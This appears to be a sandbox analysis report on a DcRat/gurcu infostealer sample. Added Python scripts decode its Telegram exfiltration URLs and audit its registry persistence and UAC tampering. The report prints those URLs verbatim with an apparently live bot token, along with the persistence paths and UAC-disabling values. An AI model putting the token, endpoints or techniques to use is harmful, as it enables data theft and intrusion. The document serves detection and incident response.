Resubmissions
  21-11-2024 22:31   241121-2fewhasrfn   score 10   Analysis

Max time kernel:  150s
Max time network: 151s
Platform:         windows10-2004_x64
Resource:         win10v2004-20241007-en
Resource tags:    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
Submitted:        21-11-2024 22:31
Behavioral tasks
  behavioral1: Sample 59b9f54f927431d2cf31d3aa202a0843.exe, Resource win7-20240903-en
  behavioral2: Sample 59b9f54f927431d2cf31d3aa202a0843.exe, Resource win10v2004-20241007-en (the task this report covers)
General
  Target: 59b9f54f927431d2cf31d3aa202a0843.exe
  Size:   2.2MB
  MD5:    59b9f54f927431d2cf31d3aa202a0843
  SHA1:   b23d214605133dc8e930f9a9d473c7c7622b4b56
  SHA256: 007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594
  SHA512: 89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8
  SSDEEP: 24576:9zyhnYISyKSBWpKCeCirC9CMz+052LEgPHQ944INbKK6uK5Ye6KBOO3op+kE9hk4:9zyt2DixLb4I5KKnK5zgdlKWky
Malware Config
Extracted
  Family: gurcu
  Exfiltration URLs (Telegram Bot API), verbatim as extracted:
    https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20GYHASOLS%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CWindowsRE%5Cfontdrvhost.ex
    https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A24.326348

  Both requests embed the operator's Bot API token in the path (the segment after "bot"; the numeric prefix 7606992605 is the bot's own Telegram user ID) and post to chat_id 7606992605. The percent-encoded caption of the sendPhoto request is a "User connected" beacon carrying the victim ID ee44a06e690425e9fc115dd2e629b02422993e11, the build comment "ютуб" (Cyrillic for "YouTube"), the user name, PC name, OS, public IP, GEO and the working directory C:\Recovery\WindowsRE\fontdrvhost.ex (cut off as recorded). The sendDocument caption is a "Log collected" report with the same victim ID, the number of scanned directories (0) and the elapsed time (00:00:24.326348). The token is a live credential: treat it as an indicator, keep it out of shared tickets, and do not exercise the API from attributable infrastructure.
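To see what the beacon actually carries, the following Python (an added example, not part of this report or of the sample) parses the two URLs above: it takes the bot ID and method from the path, the destination chat_id from the query, percent-decodes the caption and splits it into the fields the stealer fills in. The URLs are used verbatim; the first caption is truncated in the report and stays truncated here. Nothing is sent to Telegram.

```python
"""Decode the Telegram Bot API exfiltration URLs from the extracted gurcu config."""
import re
from urllib.parse import parse_qs, urlsplit

# Sample input: the two URLs exactly as the sandbox extracted them. The first caption is
# cut off by the report after "fontdrvhost.ex" and is kept that way.
SAMPLE_URLS = [
    "https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20GYHASOLS%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CWindowsRE%5Cfontdrvhost.ex",
    "https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A24.326348",
]

# Bot API paths are /bot<bot_id>:<secret>/<method>; the numeric prefix is the bot's user ID.
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")


def parse_telegram_c2(url):
    """Split one Bot API URL into bot ID, redacted token, method, chat_id and caption fields."""
    parts = urlsplit(url)
    if parts.netloc.lower() != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL: %s" % parts.netloc)
    match = BOT_PATH_RE.match(parts.path)
    if match is None:
        raise ValueError("unexpected Bot API path: %s" % parts.path)
    bot_id, secret, method = match.groups()
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes as UTF-8
    caption = query.get("caption", [""])[0]
    lines = [line.strip() for line in caption.split("\n") if line.strip()]
    fields = {}
    for line in lines[1:]:
        # Lines look like "<bullet> Key: Value"; split on the first ": " only, so a value
        # such as "00:00:24.326348" keeps its colons.
        key, sep, value = line.lstrip("\u2022 ").partition(": ")
        if sep:
            fields[key] = value
    return {
        "bot_id": bot_id,
        "token_redacted": "%s:%s..." % (bot_id, secret[:4]),  # never log the full token
        "method": method,
        "chat_id": query.get("chat_id", [""])[0],
        "title": lines[0] if lines else "",
        "fields": fields,
    }


def summarize(urls):
    """Aggregate several URLs into one view of the channel and the victim profile."""
    parsed = [parse_telegram_c2(u) for u in urls]
    profile = {}
    for p in parsed:
        profile.update(p["fields"])
    return {
        "bot_ids": sorted({p["bot_id"] for p in parsed}),
        "chat_ids": sorted({p["chat_id"] for p in parsed}),
        "methods": [p["method"] for p in parsed],
        "victim_profile": profile,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_URLS), indent=2, ensure_ascii=False))
```

The redacted token is what belongs in a ticket; the full value is only needed for takedown reporting to Telegram.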
Signatures

DcRat
  DarkCrystal RAT (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.
Dcrat family
Gurcu family
Modifies WinLogon for persistence  (2 TTPs, 14 IoCs)
  Winlogon\Shell normally holds only "explorer.exe"; Winlogon starts every comma-separated entry at logon, so each appended path runs alongside the shell (ATT&CK T1547.004). The sample rewrote the value 14 times, appending one path per write, and the n-th recorded value is "explorer.exe" followed by the first n paths below. All writes are by 59b9f54f927431d2cf31d3aa202a0843.exe. Twelve of the fourteen paths reuse the names of Windows system binaries (csrss, sppsvc, RuntimeBroker, fontdrvhost, spoolsv, upfc, winlogon) in directories where those binaries never live (T1036.005).

  description | ioc | process
  Set value (str), 14 times | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell | 59b9f54f927431d2cf31d3aa202a0843.exe

  Paths, in the order they were appended:
   1. C:\Users\Admin\NetHood\csrss.exe
   2. C:\Program Files\Windows Media Player\it-IT\sppsvc.exe
   3. C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe
   4. C:\Users\Public\csrss.exe
   5. C:\Windows\Panther\UnattendGC\fontdrvhost.exe
   6. C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe
   7. C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe
   8. C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe  (repeat of 6)
   9. C:\Windows\appcompat\Programs\upfc.exe
  10. C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe
  11. C:\Users\Default User\sysmon.exe
  12. C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe
  13. C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe  (repeat of 3)
  14. C:\Recovery\WindowsRE\fontdrvhost.exe

  Final value (as stored in the registry):
  explorer.exe, "C:\Users\Admin\NetHood\csrss.exe", "C:\Program Files\Windows Media Player\it-IT\sppsvc.exe", "C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe", "C:\Users\Public\csrss.exe", "C:\Windows\Panther\UnattendGC\fontdrvhost.exe", "C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe", "C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe", "C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe", "C:\Windows\appcompat\Programs\upfc.exe", "C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe", "C:\Users\Default User\sysmon.exe", "C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe", "C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe", "C:\Recovery\WindowsRE\fontdrvhost.exe"
Process spawned unexpected child process  (42 IoCs)
  The signature's generic description is that the parent was typically compromised via an exploit or macro. When the parent is wmiprvse.exe, the more ordinary explanation is process creation through WMI (Win32_Process.Create): the WMI provider host, not the real requester, becomes the parent, so the parent chain alone does not identify who created the tasks. Correlate with scheduled-task creation events instead. All 42 children here are schtasks.exe.

  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid_target: 4292 (wmiprvse.exe), procid_target: 82
  Process: schtasks.exe
  Child PIDs (42): 3936, 3636, 3060, 3408, 2520, 1148, 2000, 4380, 4556, 4260, 4872, 752, 1404, 3536, 3200, 3012, 3820, 4140, 3720, 396, 2600, 4800, 4152, 1032, 3836, 4384, 3008, 2820, 4992, 1972, 1964, 3056, 4160, 4768, 2340, 4068, 1956, 2940, 4516, 2484, 4136, 3592
UAC bypass
  Both the original sample and the dropped fontdrvhost.exe write the three UAC policy values under HKLM\...\Policies\System to 0: EnableLUA=0 turns UAC off after the next restart, ConsentPromptBehaviorAdmin=0 lets administrators elevate without a prompt, and PromptOnSecureDesktop=0 moves any remaining prompt off the secure desktop.

  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | fontdrvhost.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 59b9f54f927431d2cf31d3aa202a0843.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | 59b9f54f927431d2cf31d3aa202a0843.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | 59b9f54f927431d2cf31d3aa202a0843.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontdrvhost.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | fontdrvhost.exe
Yara matches (rule: dcrat)
  behavioral2/memory/1176-1-0x0000000000160000-0x000000000038E000-memory.dmp
  behavioral2/files/0x0007000000023cab-41.dat
  behavioral2/files/0x000a000000023cc7-84.dat
  behavioral2/files/0x0009000000023ca1-92.dat
  behavioral2/files/0x000a000000023cc8-134.dat
  behavioral2/files/0x0009000000023cc9-164.dat
  behavioral2/files/0x000a000000023cc9-183.dat
  behavioral2/files/0x0009000000023cca-219.dat
  behavioral2/memory/1328-221-0x0000000000920000-0x0000000000B4E000-memory.dmp
Drops file in Drivers directory  (1 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | 59b9f54f927431d2cf31d3aa202a0843.exe
  The report does not record what was written. On an infected host, diff the hosts file against a clean copy: added entries can sinkhole security-vendor or update domains.
Checks computer location settings  (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), most likely for geofencing.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | 59b9f54f927431d2cf31d3aa202a0843.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | fontdrvhost.exe
Executes dropped EXE  (1 IoCs)
  pid | Process
  1328 | fontdrvhost.exe
Reads user/profile data of web browsers  (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
Adds Run key to start application  (2 TTPs, 24 IoCs)
  All 24 writes are Set value (str) by 59b9f54f927431d2cf31d3aa202a0843.exe. The same twelve entries are written to both HKLM and the user's hive (S-1-5-21-4089630652-1596403869-279772308-1000); each value name is the file stem of the dropped copy it points at. Three names (fontdrvhost, csrss, RuntimeBroker) are written twice per hive with different paths; a value name is unique within a key, so only one path per name survives, and since the row order here is not guaranteed to be chronological, which one must be read from the registry itself.

  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  (12 IoCs)
    fontdrvhost = "C:\Windows\Panther\UnattendGC\fontdrvhost.exe"
    fontdrvhost = "C:\Recovery\WindowsRE\fontdrvhost.exe"
    RuntimeBroker = "C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe"
    csrss = "C:\Users\Public\csrss.exe"
    59b9f54f927431d2cf31d3aa202a0843 = "C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe"
    spoolsv = "C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe"
    winlogon = "C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe"
    RuntimeBroker = "C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe"
    csrss = "C:\Users\Admin\NetHood\csrss.exe"
    sppsvc = "C:\Program Files\Windows Media Player\it-IT\sppsvc.exe"
    upfc = "C:\Windows\appcompat\Programs\upfc.exe"
    sysmon = "C:\Users\Default User\sysmon.exe"

  \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  (12 IoCs)
    winlogon = "C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe"
    sysmon = "C:\Users\Default User\sysmon.exe"
    sppsvc = "C:\Program Files\Windows Media Player\it-IT\sppsvc.exe"
    csrss = "C:\Users\Public\csrss.exe"
    RuntimeBroker = "C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe"
    fontdrvhost = "C:\Recovery\WindowsRE\fontdrvhost.exe"
    fontdrvhost = "C:\Windows\Panther\UnattendGC\fontdrvhost.exe"
    59b9f54f927431d2cf31d3aa202a0843 = "C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe"
    csrss = "C:\Users\Admin\NetHood\csrss.exe"
    RuntimeBroker = "C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe"
    spoolsv = "C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe"
    upfc = "C:\Windows\appcompat\Programs\upfc.exe"
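The Winlogon\Shell list and the Run keys in the two sections above share one pattern: Windows system-binary names dropped outside System32. The following Python is an added example, not part of this report or of the sample; it splits a Shell value the way Winlogon reads it (comma-separated, paths with spaces double-quoted), strips the quoting from Run-key command lines, and flags that pattern. The sample inputs are the final Shell value and a subset of the Run entries listed above, plus one constructed benign Run entry (SecurityHealth) that is not in the report.

```python
"""Audit Winlogon\\Shell and Run-key autostart entries for system-binary names outside System32."""
import csv
import ntpath

# Binaries that legitimately live only under %SystemRoot%\System32 (or SysWOW64). The same
# file names anywhere else are a masquerading indicator (MITRE ATT&CK T1036.005).
SYSTEM32_NAMES = {
    "csrss.exe", "winlogon.exe", "wininit.exe", "lsass.exe", "services.exe", "smss.exe",
    "svchost.exe", "dllhost.exe", "spoolsv.exe", "sppsvc.exe", "fontdrvhost.exe",
    "runtimebroker.exe", "upfc.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Sample input: the final Winlogon\Shell value from the report, as it sits in the registry.
SAMPLE_SHELL_VALUE = (
    r'explorer.exe, "C:\Users\Admin\NetHood\csrss.exe", '
    r'"C:\Program Files\Windows Media Player\it-IT\sppsvc.exe", '
    r'"C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe", '
    r'"C:\Users\Public\csrss.exe", "C:\Windows\Panther\UnattendGC\fontdrvhost.exe", '
    r'"C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe", '
    r'"C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe", '
    r'"C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe", '
    r'"C:\Windows\appcompat\Programs\upfc.exe", '
    r'"C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe", '
    r'"C:\Users\Default User\sysmon.exe", '
    r'"C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe", '
    r'"C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe", '
    r'"C:\Recovery\WindowsRE\fontdrvhost.exe"'
)
# Sample input: HKLM Run values from the report plus one constructed benign control entry.
SAMPLE_RUN_KEYS = {
    "fontdrvhost": r'"C:\Recovery\WindowsRE\fontdrvhost.exe"',
    "winlogon": r'"C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe"',
    "RuntimeBroker": r'"C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe"',
    "csrss": r'"C:\Users\Public\csrss.exe"',
    "sysmon": r'"C:\Users\Default User\sysmon.exe"',
    "59b9f54f927431d2cf31d3aa202a0843": r'"C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe"',
    "SecurityHealth": r'"C:\Windows\System32\SecurityHealthSystray.exe"',  # constructed, benign
}


def split_shell_value(value):
    """Winlogon\\Shell is a comma-separated list; entries containing spaces are double-quoted."""
    row = next(csv.reader([value], skipinitialspace=True))
    return [field.strip() for field in row if field.strip()]


def command_image(command):
    """Executable path of a Run-key command line: the leading quoted token, else the first word."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def is_masquerade(path):
    """True when a System32-only binary name appears outside the system directories."""
    lowered = path.lower()
    return ntpath.basename(lowered) in SYSTEM32_NAMES and not lowered.startswith(SYSTEM_DIRS)


def audit_winlogon_shell(value):
    entries = split_shell_value(value)
    # Anything besides explorer.exe is a logon autostart; dedupe while keeping write order.
    extra = list(dict.fromkeys(e for e in entries if e.lower() != "explorer.exe"))
    return {
        "ok": not extra and any(e.lower() == "explorer.exe" for e in entries),
        "extra": extra,
        "masquerading": [e for e in extra if is_masquerade(e)],
    }


def audit_run_keys(run_values):
    """(value name, image path, masquerade flag) for every Run entry."""
    return [(name, command_image(cmd), is_masquerade(command_image(cmd)))
            for name, cmd in run_values.items()]


if __name__ == "__main__":
    shell = audit_winlogon_shell(SAMPLE_SHELL_VALUE)
    print("Winlogon\\Shell ok:", shell["ok"], "| extra entries:", len(shell["extra"]))
    for path in shell["masquerading"]:
        print("  masquerading:", path)
    for name, path, flagged in audit_run_keys(SAMPLE_RUN_KEYS):
        print("  Run\\%s -> %s%s" % (name, path, "  [MASQUERADE]" if flagged else ""))
```

Two of the Shell entries (the hash-named copy and sysmon.exe) are not caught by the name check and only show up as "extra"; on a real host every non-explorer.exe entry deserves a look, the masquerade flag just ranks them.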
Checks whether UAC is enabled
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 59b9f54f927431d2cf31d3aa202a0843.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | fontdrvhost.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontdrvhost.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 59b9f54f927431d2cf31d3aa202a0843.exe
Looks up external IP address via web service  (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  38 | ipinfo.io
  39 | ipinfo.io
Drops file in Program Files directory  (26 IoCs)
  All by 59b9f54f927431d2cf31d3aa202a0843.exe. Every target directory receives the same trio: the dropped executable, a short extensionless companion file (e.g. 9e8d7a4ca61bd9), and two transient RCX*.tmp files opened for modification during the copy. The executable-plus-companion pair is a useful hunting artefact.

  C:\Program Files\Windows Media Player\it-IT\
    File created: sppsvc.exe, 0a1fd5f707cd16
    File opened for modification: sppsvc.exe, RCXCBDF.tmp, RCXCC6D.tmp
  C:\Program Files (x86)\Internet Explorer\en-US\
    File created: winlogon.exe, cc11b995f2a76d
    File opened for modification: winlogon.exe, RCXDF85.tmp, RCXDF96.tmp
  C:\Program Files (x86)\Microsoft.NET\RedistList\
    File created: RuntimeBroker.exe, 9e8d7a4ca61bd9
    File opened for modification: RuntimeBroker.exe, 9e8d7a4ca61bd9, RCXCE81.tmp, RCXCE82.tmp
  C:\Program Files (x86)\Windows Defender\es-ES\
    File created: RuntimeBroker.exe, 9e8d7a4ca61bd9
    File opened for modification: RuntimeBroker.exe, RCXE43C.tmp, RCXE44D.tmp
  C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\
    File created: spoolsv.exe, f3b6ecef712a24
    File opened for modification: spoolsv.exe, RCXD84D.tmp, RCXD85E.tmp
Drops file in Windows directory  (10 IoCs)
  All by 59b9f54f927431d2cf31d3aa202a0843.exe.
  C:\Windows\Panther\UnattendGC\
    File created: fontdrvhost.exe, 5b884080fd4f94
    File opened for modification: fontdrvhost.exe, RCXD3B5.tmp, RCXD3B6.tmp
  C:\Windows\appcompat\Programs\
    File created: upfc.exe, ea1d8f6d871115
    File opened for modification: upfc.exe, RCXDC85.tmp, RCXDD03.tmp
Enumerates physical storage devices  (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Modifies registry class  (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | 59b9f54f927431d2cf31d3aa202a0843.exe
  Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | fontdrvhost.exe
Scheduled Task/Job: Scheduled Task  (1 TTPs, 42 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Process: schtasks.exe
  PIDs (42): 3936, 3408, 3536, 3820, 3720, 2600, 4800, 3060, 4992, 4068, 2484, 2000, 3836, 2820, 3056, 2340, 3592, 1148, 1404, 3200, 3012, 3008, 2520, 4260, 4872, 752, 1964, 4380, 4556, 396, 4384, 4516, 2940, 3636, 4140, 4152,1972, 4160, 4768, 1956, 1032, 4136
Suspicious behavior: EnumeratesProcesses  (64 IoCs)
  pid | Process
  1176 | 59b9f54f927431d2cf31d3aa202a0843.exe  (repeated)
  1328 | fontdrvhost.exe  (repeated)
  The 64 entries are all from these two processes.
Suspicious behavior: GetForegroundWindowSpam  (1 IoCs)
  pid | Process
  1328 | fontdrvhost.exe
Suspicious use of AdjustPrivilegeToken  (5 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1176 | 59b9f54f927431d2cf31d3aa202a0843.exe
  Token: SeDebugPrivilege | 1328 | fontdrvhost.exe
  Token: SeBackupPrivilege | 5048 | vssvc.exe
  Token: SeRestorePrivilege | 5048 | vssvc.exe
  Token: SeAuditPrivilege | 5048 | vssvc.exe
  vssvc.exe is the Windows Volume Shadow Copy service and holds those three privileges by design; its appearance here reflects the VSS COM API activity noted below rather than a privilege grab by the malware. SeDebugPrivilege in the two malware processes is the one to act on.
Suspicious use of SetWindowsHookEx  (1 IoCs)
  pid | Process
  1328 | fontdrvhost.exe
  A Windows hook installed by the same process that polls GetForegroundWindow is consistent with keystroke and active-window capture.
Suspicious use of WriteProcessMemory  (10 IoCs)
  Each pair is recorded twice. Read together with the PIDs elsewhere in this report, the pairs trace the launch chain: 1176 (sample) -> 1096 cmd.exe -> 5052 w32tm.exe and 1328 fontdrvhost.exe -> 2600 and 4152 schtasks.exe.
  description | pid | Process | procid_target
  PID 1176 wrote to memory of 1096 | 1176 | 59b9f54f927431d2cf31d3aa202a0843.exe | 131  (x2)
  PID 1096 wrote to memory of 5052 | 1096 | cmd.exe | 133  (x2)
  PID 1096 wrote to memory of 1328 | 1096 | cmd.exe | 134  (x2)
  PID 1328 wrote to memory of 2600 | 1328 | fontdrvhost.exe | 135  (x2)
  PID 1328 wrote to memory of 4152 | 1328 | fontdrvhost.exe | 136  (x2)
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 59b9f54f927431d2cf31d3aa202a0843.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
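The three policy values listed under "System policy modification" (EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop, each set to 0 by both the dropper and the dropped fontdrvhost.exe) are the registry side of the "UAC bypass" signature: EnableLUA=0 switches UAC off at the next reboot, ConsentPromptBehaviorAdmin=0 makes administrators elevate without any prompt, and PromptOnSecureDesktop=0 moves whatever prompt remains onto the ordinary desktop. The following is an added detection example, not part of the sandbox report and not DcRat code. It evaluates Sysmon-style registry value-set events (Event ID 13, with the Image, TargetObject and Details fields) for exactly this tampering; the sample events are constructed to mirror the report's six IoCs, and the svchost.exe event writing the Windows default value 5 is an invented benign control case.

```python
"""Flag UAC policy tampering in Sysmon-style registry value-set events.

Added example for this report; not code from the sandbox or from DcRat.
Assumptions: events are dicts carrying Sysmon Event ID 13 field names
(Image, TargetObject, Details); the svchost.exe event is invented as a
benign control case and is not from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

UAC_POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"

# Meaning of a zero in each of the three values the sample set.
# ConsentPromptBehaviorAdmin: 0 = elevate silently, 2 = always prompt for consent
# on the secure desktop, 5 = Windows default (prompt only for non-Windows binaries).
# EnableLUA changes only take effect after a reboot.
WEAK_IF_ZERO = {
    "enablelua": "UAC switched off entirely (applies at next reboot)",
    "consentpromptbehavioradmin": "administrators are elevated with no prompt",
    "promptonsecuredesktop": "elevation prompts drawn on the user desktop, where other windows can cover them",
}

DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{1,8})\)")

# Constructed sample: the six writes from the report (native NT key path, as the
# sandbox prints it) plus one benign write invented as a control case.
POLICY_KEY_NT = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
DROPPER_IMAGE = r"C:\Users\Admin\AppData\Local\Temp\59b9f54f927431d2cf31d3aa202a0843.exe"
PAYLOAD_IMAGE = r"C:\Recovery\WindowsRE\fontdrvhost.exe"


def make_event(image: str, value_name: str, details: str) -> Dict:
    """Build one Event ID 13 record in Sysmon's field layout (assumed shape)."""
    return {"EventID": 13, "Image": image,
            "TargetObject": POLICY_KEY_NT + "\\" + value_name, "Details": details}


SAMPLE_EVENTS = [
    make_event(PAYLOAD_IMAGE, "EnableLUA", "DWORD (0x00000000)"),
    make_event(PAYLOAD_IMAGE, "ConsentPromptBehaviorAdmin", "DWORD (0x00000000)"),
    make_event(PAYLOAD_IMAGE, "PromptOnSecureDesktop", "DWORD (0x00000000)"),
    make_event(DROPPER_IMAGE, "EnableLUA", "DWORD (0x00000000)"),
    make_event(DROPPER_IMAGE, "ConsentPromptBehaviorAdmin", "DWORD (0x00000000)"),
    make_event(DROPPER_IMAGE, "PromptOnSecureDesktop", "DWORD (0x00000000)"),
    # invented benign control: a system process writing the Windows default
    make_event(r"C:\Windows\System32\svchost.exe", "ConsentPromptBehaviorAdmin", "DWORD (0x00000005)"),
]


@dataclass
class Finding:
    image: str
    value_name: str
    value: int
    impact: str


def normalize_key(target_object: str) -> str:
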